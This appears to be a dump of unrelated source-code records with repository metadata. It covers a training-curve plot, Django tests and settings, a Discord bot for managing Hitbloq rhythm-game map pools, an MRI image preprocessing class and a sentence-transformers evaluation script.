training_errors= [2.880890389084816, 2.589109110832214, 2.529299919307232, 2.4656221523880957, 2.403166337311268, 2.4464233142137526, 2.375447287261486, 2.3676583436131478, 2.3073809832334518, 2.359292232692242, 2.3350265485048296, 2.2823567962646485, 2.2687944075465203, 2.2951272314786912, 2.282493242323399, 2.2626508274674415, 2.258985004425049, 2.2431524062156676, 2.226141297519207, 2.2092211750149726, 2.215476005077362, 2.209359174370766, 2.1948138630390166, 2.193422330915928, 2.1807888588309288]
validation_errors=[2.435073028564453, 2.3433548278808596, 2.315739807128906, 2.2985709838867185, 2.2562687683105467, 2.2732557678222656, 2.2361006469726563, 2.222836364746094, 2.2145645141601564, 2.2109912719726563, 2.20832763671875, 2.1882525634765626, 2.1855752868652343, 2.183926452636719, 2.180730743408203, 2.1761441955566405, 2.1777948303222656, 2.1717729797363283, 2.1632617797851563, 2.161899658203125, 2.16302978515625, 2.155210754394531, 2.147050506591797, 2.1581705627441408, 2.1517400207519533]
epochnum=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]
fig1 = plt.figure()
axes1 = fig1.add_axes([0.1,0.1,0.8,0.8])
axes1.plot(epochnum,training_errors,'r')
axes1.set_xlabel('Train Epochs')
axes1.set_ylabel('Training Error')
fig1.savefig('trainAccuracy.png')
fig2 = plt.figure()
axes2 = fig2.add_axes([0.1,0.1,0.8,0.8])
axes2.plot(epochnum,validation_errors,'b')
axes2.set_xlabel('Train Epochs')
axes2.set_ylabel('Validation Error')
fig2.savefig('valAccuracy.png')
plt.plot()
| 52.088235
| 506
| 0.784303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 209
| 0.118012
|
36720adea01a0055ba50050d6d0540ddb952c604
| 2,926
|
py
|
Python
|
nc/tests/test_views.py
|
OpenDataPolicingNC/Traffic-Stops
|
74e0d16ad2ac32addca6f04d34c2ddf36d023990
|
[
"MIT"
] | 25
|
2015-09-12T23:10:52.000Z
|
2021-03-24T08:39:46.000Z
|
nc/tests/test_views.py
|
OpenDataPolicingNC/Traffic-Stops
|
74e0d16ad2ac32addca6f04d34c2ddf36d023990
|
[
"MIT"
] | 159
|
2015-07-01T03:57:23.000Z
|
2021-04-17T21:09:19.000Z
|
nc/tests/test_views.py
|
copelco/NC-Traffic-Stops
|
74e0d16ad2ac32addca6f04d34c2ddf36d023990
|
[
"MIT"
] | 8
|
2015-10-02T16:56:40.000Z
|
2020-10-18T01:16:29.000Z
|
from django.core.urlresolvers import reverse
from django.test import TestCase
from nc.tests import factories
class ViewTests(TestCase):
multi_db = True
def test_home(self):
response = self.client.get(reverse('nc:home'))
self.assertEqual(200, response.status_code)
def test_search(self):
response = self.client.get(reverse('nc:stops-search'))
self.assertEqual(200, response.status_code)
def test_agency_detail(self):
agency = factories.AgencyFactory(name="Durham")
response = self.client.get(reverse('nc:agency-detail', args=[agency.pk]))
self.assertEqual(200, response.status_code)
def test_agency_list(self):
response = self.client.get(reverse('nc:agency-list'))
self.assertEqual(200, response.status_code)
def test_agency_list_sorted_agencies(self):
"""
Verify that agencies are delivered in an appropriately sorted and
chunked form.
"""
factories.AgencyFactory(name="Abc")
factories.AgencyFactory(name="Def")
factories.AgencyFactory(name="Ghi")
factories.AgencyFactory(name="Abc_")
factories.AgencyFactory(name="Def_")
factories.AgencyFactory(name="Ghi_")
factories.AgencyFactory(name="Abc__")
factories.AgencyFactory(name="Def__")
factories.AgencyFactory(name="Ghi__")
factories.AgencyFactory(name="Abc___")
factories.AgencyFactory(name="Def___")
factories.AgencyFactory(name="Ghi___")
factories.AgencyFactory(name="Abc____")
factories.AgencyFactory(name="Def____")
factories.AgencyFactory(name="Ghi____")
response = self.client.get(reverse('nc:agency-list'))
sorted_agencies = response.context['sorted_agencies']
# Verify that there are three alphabetic categories
self.assertEqual(3, len(sorted_agencies))
keys = [pair[0] for pair in sorted_agencies]
# Verify that the relevant letters are in there
self.assertTrue("A" in keys)
self.assertTrue("D" in keys)
self.assertTrue("G" in keys)
# Verify that each alphabetic category contains three chunks
# with the appropriate number of pieces (i.e. 2, 2, 1)
for (letter, chunks) in sorted_agencies:
self.assertEqual(3, len(chunks))
self.assertEqual(2, len(chunks[0]))
self.assertEqual(2, len(chunks[1]))
self.assertEqual(1, len(chunks[2]))
def test_homepage_find_a_stop(self):
"""Test Find a Stop form is present on NC homepage"""
response = self.client.get(reverse('md:home'))
# make sure form is in context
self.assertTrue('find_a_stop_form' in response.context)
form = response.context['find_a_stop_form']
# make sure required agency field label is present
self.assertContains(response, form['agency'].label)
| 39.013333
| 81
| 0.66473
| 2,814
| 0.961722
| 0
| 0
| 0
| 0
| 0
| 0
| 724
| 0.247437
|
367317abfaeafe103c587d9d91dc6360e2f8aec5
| 24,706
|
py
|
Python
|
hitbloq_bot.py
|
PulseLane/hitbloq
|
94ea0563e6c2e34c0ff63b99cda8c6ff064e0910
|
[
"MIT"
] | null | null | null |
hitbloq_bot.py
|
PulseLane/hitbloq
|
94ea0563e6c2e34c0ff63b99cda8c6ff064e0910
|
[
"MIT"
] | null | null | null |
hitbloq_bot.py
|
PulseLane/hitbloq
|
94ea0563e6c2e34c0ff63b99cda8c6ff064e0910
|
[
"MIT"
] | null | null | null |
import asyncio
import json
import time
import sys
import discord
from discord.utils import get
import create_action
from db import database
import beatsaver
from cr_formulas import curves
from general import full_clean
beatsaver_interface = beatsaver.BeatSaverInterface()
def read_f(path):
f = open(path,'r')
dat = f.read()
f.close()
return dat
token = read_f('data/token.txt')
guild_id = 'Hitbloq'
client = discord.Client()
GENERAL_COMMANDS_CHANNEL = 'general-commands'
ADMIN_COMMANDS_CHANNEL = 'admin-commands'
POOL_ADMIN_COMMANDS_CHANNEL = 'pool-admin-commands'
PATRON_COMMANDS_CHANNEL = 'patron-commands'
channels = []
def safe_string(s):
valid_chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
valid_chars += ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '_']
for char in s:
if char not in valid_chars:
return False
if s == '':
return False
return True
def is_admin(user):
if 'admin' in [role.name for role in user.roles]:
return True
else:
return False
def invalid_curve_data(json_data):
if json_data['type'] == 'basic':
if 'cutoff' in json_data:
if json_data['cutoff'] == 0:
return 'The cutoff may not be 0.'
if json_data['type'] == 'linear':
if 'points' in json_data:
json_data['points'].sort()
if len(json_data['points']) > 15:
return 'You may not have more than 15 points in your curve.'
if (json_data['points'][0] != [0, 0]) or (json_data['points'][-1] != [1, 1]):
return 'The first and last points must be `[0, 0]` and `[1, 1]` respectively.'
if len(set([p[0] for p in json_data['points']])) != len(json_data['points']):
return 'The x values for every point must be unique.'
# valid
return None
@client.event
async def on_ready():
for guild in client.guilds:
if guild.name == guild_id:
global channels, active_guild
active_guild = guild
channels = guild.channels
break
print(client.user.name + ' has connected to Discord!')
@client.event
async def on_message(message):
global channels, active_guild
for line in message.content.split('\n'):
message_args = line.split(' ')
if message.channel.name == PATRON_COMMANDS_CHANNEL:
if message_args[0] in ['!set_banner', '!set_profile_banner', '!set_profile_background']:
field = {'!set_banner': 'score_banner', '!set_profile_banner': 'profile_banner', '!set_profile_background': 'profile_background'}[message_args[0]]
banner_url = message_args[1]
if (banner_url[:20] == 'https://i.imgur.com/') and (banner_url.split('.')[-1] in ['png', 'jpeg', 'jpg']):
user_id = int(message_args[2])
users = database.get_users([user_id])
if len(users):
database.update_user(users[0], {'$set': {field: banner_url}})
await message.channel.send(message.author.mention + ' a new score banner has been set!')
else:
await message.channel.send(message.author.mention + ' banner URLs must be https://i.imgur.com links and they must be png or jpeg/jpg. You can get these by right clicking the image and clicking "open image in new tab".')
if message_args[0] == '!create_pool':
try:
new_pool_id = message_args[1]
valid_creation_roles = ['CR Farmer', 'CR Grinder']
highest_role = None
for valid_role in valid_creation_roles:
if valid_role in [role.name for role in message.author.roles]:
highest_role = valid_role
if highest_role:
threshold = 1
if highest_role == 'CR Grinder':
threshold = 3
if new_pool_id not in database.get_pool_ids(True):
if safe_string(new_pool_id):
if database.get_rate_limits(message.author.id, hash=False)['pools_created'] < threshold:
role = get(active_guild.roles, name='map pool people')
pool_channel = get(active_guild.channels, name='pool-admin-commands')
await message.author.add_roles(role)
database.ratelimit_add(message.author.id, 'pools_created', hash=False)
database.create_map_pool(new_pool_id)
database.set_pool_owners(new_pool_id, [message.author.id])
await message.channel.send(message.author.mention + ' created the map pool `' + new_pool_id + '`! Head over to ' + pool_channel.mention + ' to manage your new pool.')
else:
await message.channel.send(message.author.mention + ' You\'ve already created too many pools.')
else:
await message.channel.send(message.author.mention + ' This pool ID contains forbidden characters. It may only include lowercase letters, numbers, and underscores.')
else:
await message.channel.send(message.author.mention + ' This pool ID has been taken.')
else:
await message.channel.send(message.author.mention + ' You must be a CR Farmer or CR Grinder patron to use this command.')
except IndexError:
await message.channel.send(message.author.mention + ' invalid arguments. Should be `!create_pool <new_pool_id>`.')
if message.channel.name == GENERAL_COMMANDS_CHANNEL:
if message_args[0] == '!add':
scoresaber_id = message_args[1]
create_action.create_user(scoresaber_id)
await message.channel.send(message.author.mention + ' user ' + scoresaber_id + ' has been added to the action queue.\nhttps://hitbloq.com/actions')
if message_args[0] == '!views':
await message.channel.send(message.author.mention + ' Hitbloq has accumulated ' + str(int(database.get_counter('views')['count'])) + ' views!')
if message.channel.name == ADMIN_COMMANDS_CHANNEL:
if message_args[0] == '!set_event':
event_data = ' '.join(message_args[1:])
if event_data == '':
database.db['events'].update_one({'_id': 'current_event'}, {'$set': {'event_id': -1}})
await message.channel.send(message.author.mention + ' the current event has been updated to `none`.')
else:
try:
event_data = json.loads(event_data.replace('\'', '"'))
event_data = {
'_id': int(event_data['_id']),
'title': str(event_data['title']),
'image': str(event_data['image']),
'description': str(event_data['description']),
'pool': str(event_data['pool']),
'urt_description': str(event_data['description']) if 'urt_description' not in event_data else str(event_data['urt_description']),
'urt_title': str(event_data['title']) if 'urt_title' not in event_data else str(event_data['urt_title']),
}
database.db['events'].replace_one({'_id': event_data['_id']}, event_data, upsert=True)
database.db['events'].update_one({'_id': 'current_event'}, {'$set': {'event_id': event_data['_id']}})
await message.channel.send(message.author.mention + ' the current event has been updated to `' + str(event_data['_id']) + '`.')
except:
await message.channel.send(message.author.mention + ' there was an error in the formatting of the event data.')
if message_args[0] == '!delete_pool':
pool_id = message_args[1]
database.delete_map_pool(pool_id)
await message.channel.send(message.author.mention + ' deleted the `' + pool_id + '` map pool.')
if message_args[0] == '!stop_bot':
await message.channel.send(message.author.mention + ' stopping... :(')
sys.exit()
if message_args[0] == '!recalculate_cr':
map_pools = message_args[1].split(',')
create_action.recalculate_cr(map_pools)
await message.channel.send(message.author.mention + ' a cr recalculation for `' + str(map_pools) + '` has been added to the action queue.\nhttps://hitbloq.com/actions')
if message_args[0] == '!update_rank_histories':
for pool_id in database.get_pool_ids(False):
create_action.update_rank_histories(pool_id)
await message.channel.send(message.author.mention + ' a full player history update has been added to the action queue.\nhttps://hitbloq.com/actions')
if message_args[0] == '!set_announcement':
announcement_html = ' '.join(message_args[1:])
if announcement_html == '':
database.db['config'].update_one({'_id': 'announcement'}, {'$set': {'html': None}})
else:
database.db['config'].update_one({'_id': 'announcement'}, {'$set': {'html': announcement_html}})
if message_args[0] == '!rewind':
rewind_id = int(message_args[1])
rewind_amount = int(message_args[2])
rewind_amount = max(0, rewind_amount)
rewind_to = time.time() - rewind_amount
database.db['users'].update_one({'_id': rewind_id}, {'$set': {'last_update': rewind_to}})
create_action.update_user(rewind_id)
await message.channel.send(message.author.mention + ' user ' + str(rewind_id) + ' will be rewinded and updated.')
if message.channel.name == POOL_ADMIN_COMMANDS_CHANNEL:
if message_args[0] == '!regenerate_playlists':
create_action.regenerate_playlists()
await message.channel.send(message.author.mention + ' hashlist generation has been added to the action queue.\nhttps://hitbloq.com/actions')
if message_args[0] == '!set_playlist_cover':
valid_host = 'https://i.imgur.com/'
pool_id = message_args[1]
image_url = message_args[2]
if pool_id in database.get_pool_ids(True):
if database.is_pool_owner(pool_id, message.author.id):
if (image_url[:len(valid_host)] != valid_host) or (image_url.split('.')[-1] != 'png'):
await message.channel.send(message.author.mention + ' the image URL must come from ' + valid_host + ' and be a PNG')
else:
database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'playlist_cover': image_url}})
await message.channel.send(message.author.mention + ' the pool image has been updated')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
if message_args[0] == '!set_banner_title_hide':
try:
pool_id = message_args[1]
boolean = message_args[2].lower()
if database.is_pool_owner(pool_id, message.author.id) or is_admin(message.author):
if boolean in ['true', 'false']:
if boolean == 'true':
hide = True
else:
hide = False
database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'banner_title_hide': hide}})
await message.channel.send(message.author.mention + ' set banner title visibility to `' + str(hide) + '`.')
else:
await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_banner_title_hide <pool_id> true/false`')
else:
await message.channel.send(message.author.mention + ' You do not have permissions to modify this pool.')
except IndexError:
await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_banner_title_hide <pool_id> true/false`')
if message_args[0] == '!set_accumulation_constant':
try:
pool_id = message_args[1]
accumulation_constant = float(message_args[2])
if database.is_pool_owner(pool_id, message.author.id) or is_admin(message.author):
database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'accumulation_constant': accumulation_constant}})
await message.channel.send(message.author.mention + ' The accumulation constant for the ' + pool_id + ' pool has been set to `' + str(accumulation_constant) + '`.')
else:
await message.channel.send(message.author.mention + ' You do not have permissions to modify this pool.')
except IndexError:
await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_accumulation_constant <pool_id> <constant>`')
if message_args[0] == '!set_shown_name':
try:
pool_id = message_args[1]
shown_name = ' '.join(message_args[2:])
if shown_name == '':
await message.channel.send(message.author.mention + ' shown name must not be an empty string.')
elif database.is_pool_owner(pool_id, message.author.id) or is_admin(message.author):
database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'shown_name': full_clean(shown_name)}})
await message.channel.send(message.author.mention + ' The shown name for the ' + pool_id + ' pool has been set to `' + shown_name + '`.')
else:
await message.channel.send(message.author.mention + ' You do not have permissions to modify this pool.')
except IndexError:
await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_shown_name <pool_id> <shown_name>`')
if message_args[0] == '!set_owners':
try:
pool_id = message_args[1]
valid_permissions = False
if is_admin(message.author):
valid_permissions = True
else:
if database.is_pool_owner(pool_id, message.author.id):
valid_permissions = True
if valid_permissions:
owner_list = [user.id for user in message.mentions]
if message.author.id in owner_list:
database.set_pool_owners(pool_id, owner_list)
# add map pool people role to all owners
role = get(active_guild.roles, name='map pool people')
for user in message.mentions:
await user.add_roles(role)
await message.channel.send(' '.join([user.mention for user in message.mentions]) + ' You have been set to the owner(s) of the `' + pool_id + '` pool.')
else:
await message.channel.send(message.author.mention + ' You must list yourself as an owner. If you would like to delete the pool, please contact an admin.')
else:
await message.channel.send(message.author.mention + ' Sorry, but you don\'t have permissions to modify this pool.')
except IndexError:
await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_owners <pool_id> @owner1 @owner2 etc.`')
if message_args[0] == '!set_img':
valid_host = 'https://i.imgur.com/'
pool_id = message_args[1]
image_url = message_args[2]
if pool_id in database.get_pool_ids(True):
if database.is_pool_owner(pool_id, message.author.id):
if (image_url[:len(valid_host)] != valid_host) or (image_url.split('.')[-1] != 'png'):
await message.channel.send(message.author.mention + ' the image URL must come from ' + valid_host + ' and be a PNG')
else:
database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'cover': image_url}})
await message.channel.send(message.author.mention + ' the pool image has been updated')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
if message_args[0] == '!recalculate_cr':
pool_id = message_args[1]
if pool_id in database.get_pool_ids(True):
if database.is_pool_owner(pool_id, message.author.id):
create_action.recalculate_cr([pool_id])
await message.channel.send(message.author.mention + ' the action queue has been updated with the recalc request for ' + pool_id + '.\nhttps://hitbloq.com/actions')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
if message_args[0] == '!set_manual':
song_id = message_args[1]
pool_id = message_args[2]
forced_rating = float(message_args[3])
if pool_id in database.get_pool_ids(True):
matched_leaderboards = database.get_leaderboards([song_id])
if not len(matched_leaderboards):
await message.channel.send(message.author.mention + ' that song ID appears to be invalid')
else:
if database.is_pool_owner(pool_id, message.author.id):
database.db['leaderboards'].update_one({'_id': song_id}, {'$set': {'forced_star_rating.' + pool_id: forced_rating}})
await message.channel.send(message.author.mention + ' switched the leaderboard to manual star ratings (' + str(forced_rating) + ').')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
if message_args[0] == '!set_automatic':
song_id = message_args[1]
pool_id = message_args[2]
if pool_id in database.get_pool_ids(True):
matched_leaderboards = database.get_leaderboards([song_id])
if not len(matched_leaderboards):
await message.channel.send(message.author.mention + ' that song ID appears to be invalid')
else:
if database.is_pool_owner(pool_id, message.author.id):
database.db['leaderboards'].update_one({'_id': song_id}, {'$unset': {'forced_star_rating.' + pool_id: 1}})
await message.channel.send(message.author.mention + ' switched the leaderboard to automatic star ratings.')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
if message_args[0] == '!rank':
song_id = message_args[1]
pool_id = message_args[2]
if pool_id in database.get_pool_ids(True):
song_data = beatsaver_interface.verify_song_id(song_id)
if song_data:
if database.is_pool_owner(pool_id, message.author.id):
create_action.rank_song(song_id, pool_id)
await message.channel.send(message.author.mention + ' the action queue has been updated with the rank request for:\n' + song_data['metadata']['songName'] + ' - ' + song_id.split('|')[-1][1:] + '\n(<https://beatsaver.com/beatmap/' + song_data['id'] + '>)!\nhttps://hitbloq.com/actions')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that song ID appears to be invalid')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
if message_args[0] == '!unrank':
song_id = message_args[1]
pool_id = message_args[2]
if pool_id in database.get_pool_ids(True):
if database.is_pool_owner(pool_id, message.author.id):
create_action.unrank_song(song_id, pool_id)
await message.channel.send(message.author.mention + ' the action queue has been updated with the unrank request for:\n' + song_id + '\nhttps://hitbloq.com/actions')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
if message_args[0] == '!set_curve':
pool_id = message_args[1]
if pool_id in database.get_pool_ids(True):
if database.is_pool_owner(pool_id, message.author.id):
try:
json_data = json.loads(' '.join(message_args[2:]))
if json_data['type'] in curves:
if invalid_curve_data(json_data):
await message.channel.send(message.author.mention + ' Invalid curve config: ' + invalid_curve_data(json_data))
else:
database.set_pool_curve(pool_id, json_data)
await message.channel.send(message.author.mention + ' the curve for ' + pool_id + ' has been updated. You may want to run `!recalculate_cr ' + pool_id + '`.')
else:
await message.channel.send(message.author.mention + ' the specified curve does not exist.')
except:
await message.channel.send(message.author.mention + ' the JSON formatting is invalid.')
else:
await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
else:
await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
client.run(token)
| 63.348718
| 313
| 0.551769
| 0
| 0
| 0
| 0
| 22,727
| 0.919898
| 22,699
| 0.918765
| 5,890
| 0.238404
|
3673734968412c54bc6045e1a17de68b5afe3f70
| 1,885
|
py
|
Python
|
GUI/preprocessing.py
|
muhammadtarek98/Graduation-project
|
48f8df3b38c17f99787c8ffbe8f2bdcac166fce2
|
[
"MIT"
] | null | null | null |
GUI/preprocessing.py
|
muhammadtarek98/Graduation-project
|
48f8df3b38c17f99787c8ffbe8f2bdcac166fce2
|
[
"MIT"
] | null | null | null |
GUI/preprocessing.py
|
muhammadtarek98/Graduation-project
|
48f8df3b38c17f99787c8ffbe8f2bdcac166fce2
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2 as cv
import os
from PIL import Image
class preprocessing:
def __init__(self, axial_path, coronal_path, sagittal_path):
axial_path = axial_path[1:-1]
coronal_path = coronal_path[1:-1]
sagittal_path = sagittal_path[1:-1]
axial_images = axial_path.split(',')
coronal_images = coronal_path.split(',')
sagittal_images = sagittal_path.split(',')
self.to_numpy(axial_images, 'axial.npy')
self.to_numpy(coronal_images, 'coronal.npy')
self.to_numpy(sagittal_images, 'sagittal.npy')
return
def to_numpy(self, images, file_name):
if not os.path.exists('temp'):
os.mkdir('temp')
result = []
for i in images:
i = i.strip()
i = i[1:-1]
temp = cv.imread(i)
temp = self.denoise_image(temp)
img = self.resize_image(temp)
data = np.array(img, dtype='uint8')
result.append(data[:,:,0])
np.save(r'temp/{}'.format(file_name), result)
return
def resize_image(self, img):
pixles = 256
if img.shape[0] > pixles or img.shape[1] > pixles:
output = cv.resize(img, (pixles,pixles), interpolation=cv.INTER_CUBIC)
else:
output = cv.resize(img, (pixles,pixles), interpolation=cv.INTER_LINEAR)
return output
def denoise_image(self, image):
gray = cv.cvtColor(image,cv.COLOR_BGR2GRAY)
_,edge = cv.threshold(gray,30,255,cv.THRESH_BINARY)
contours,_ = cv.findContours(edge,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)
contours = sorted(contours,key=cv.contourArea,reverse=True)[0]
mask = np.zeros(image.shape[:2],np.uint8)
mask = cv.drawContours(mask,[contours],-1,(255),-1)
res = cv.bitwise_and(image,image,mask=mask)
return res
| 37.7
| 83
| 0.606897
| 1,816
| 0.963395
| 0
| 0
| 0
| 0
| 0
| 0
| 76
| 0.040318
|
36740a39b572e9f7d2dc74c2436385fe4043acca
| 3,022
|
py
|
Python
|
examples/generate_og_predictions.py
|
dennlinger/sentence-transformers
|
67e82af977fbb198142ede7fbe941b74f8ce6c89
|
[
"Apache-2.0"
] | 5
|
2020-12-25T07:22:54.000Z
|
2022-02-15T16:35:19.000Z
|
examples/generate_og_predictions.py
|
dennlinger/sentence-transformers
|
67e82af977fbb198142ede7fbe941b74f8ce6c89
|
[
"Apache-2.0"
] | null | null | null |
examples/generate_og_predictions.py
|
dennlinger/sentence-transformers
|
67e82af977fbb198142ede7fbe941b74f8ce6c89
|
[
"Apache-2.0"
] | 2
|
2021-04-04T17:50:25.000Z
|
2021-11-18T01:17:21.000Z
|
"""
The system RoBERTa trains on the AGB dataset with softmax loss function.
At every 1000 training steps, the model is evaluated on the AGB dev set.
"""
from torch.utils.data import DataLoader
from sentence_transformers import models, losses
from sentence_transformers import SentencesDataset, LoggingHandler, SentenceTransformer
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator, LabelGenerationEvaluator
from sentence_transformers.readers import *
import logging
import torch
import os
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
handlers=[LoggingHandler()])
#### /print debug information to stdout
# # Read the dataset
root_dir = "/data/salmasian/sentence_transformers"
for i in range(1, 6):
run_dir = os.path.join(root_dir, f"run{i}")
for model_dir in sorted(os.listdir(run_dir)):
curr_dir = os.path.join(run_dir, model_dir)
# skip non-consecutive models
if f"og_{i}" not in curr_dir:
continue
print(f"Working on model {model_dir}")
# Delete when we re-evaluate...
labels_file = os.path.join(curr_dir, "prediction_labels.csv")
pred_file = os.path.join(curr_dir, "prediction_results.csv")
if os.path.isfile(labels_file):
os.remove(os.path.join(curr_dir, "prediction_labels.csv"))
if os.path.isfile(pred_file):
os.remove(os.path.join(curr_dir, "prediction_results.csv"))
# Model path
model_save_path = curr_dir
batch_size = 24
agb_reader = TestAGBReader('datasets/og-test')
train_num_labels = agb_reader.get_num_labels()
model = SentenceTransformer(model_save_path, device="cuda:0")
train_loss = losses.SoftmaxLoss(model=model,
sentence_embedding_dimension=model.get_sentence_embedding_dimension(),
num_labels=train_num_labels)
train_loss.classifier = torch.load(os.path.join(model_save_path, "2_Softmax/pytorch_model.bin"))
print("test")
test_dir = "/data/daumiller/sentence-transformers/examples/datasets/og-test"
for fn in sorted(os.listdir(test_dir)):
examples = agb_reader.get_examples(fn)
if not examples:
continue
# Hack to avoid problems with docs almost as long as batch size
if len(examples) == batch_size + 1:
batch_size_used = batch_size - 3
else:
batch_size_used = batch_size
test_data = SentencesDataset(examples=examples, model=model, shorten=True)
test_dataloader = DataLoader(test_data, shuffle=False, batch_size=batch_size_used)
evaluator = LabelGenerationEvaluator(test_dataloader, softmax_model=train_loss)
model.evaluate(evaluator, model_save_path)
| 45.104478
| 110
| 0.666115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 758
| 0.250827
|
3674bf513c78cb14c7a7197f8717bd835994b08c
| 9,730
|
py
|
Python
|
config/settings/defaults.py
|
lucaluca/palimpsest
|
64565d1b188d68bc978253a21a98440b769e26ee
|
[
"BSD-3-Clause"
] | null | null | null |
config/settings/defaults.py
|
lucaluca/palimpsest
|
64565d1b188d68bc978253a21a98440b769e26ee
|
[
"BSD-3-Clause"
] | null | null | null |
config/settings/defaults.py
|
lucaluca/palimpsest
|
64565d1b188d68bc978253a21a98440b769e26ee
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Base settings to build other settings files upon.
"""
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (palimpsest/config/settings/base.py - 3 = palimpsest/)
APPS_DIR = ROOT_DIR.path('palimpsest')
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('DJANGO_READ_DOT_ENV_FILE', default=False)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR.path('.env')))
# GENERAL
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', False)
TIME_ZONE = 'CST'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = True
USE_TZ = True
# DATABASES
# ------------------------------------------------------------------------------
# SQLite by default
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(APPS_DIR, 'db.sqlite3'),
}
}
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = 'config.urls'
WSGI_APPLICATION = 'config.wsgi.application'
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'django.contrib.admin',
]
THIRD_PARTY_APPS = [
'crispy_forms',
'allauth',
'allauth.account',
'allauth.socialaccount',
'rest_framework',
]
LOCAL_APPS = [
'users',
]
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {
'sites': 'palimpsest.contrib.sites.migrations'
}
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
]
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{ 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', },
{ 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', },
{ 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', },
{ 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', },
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [
str(APPS_DIR.path('static')),
]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
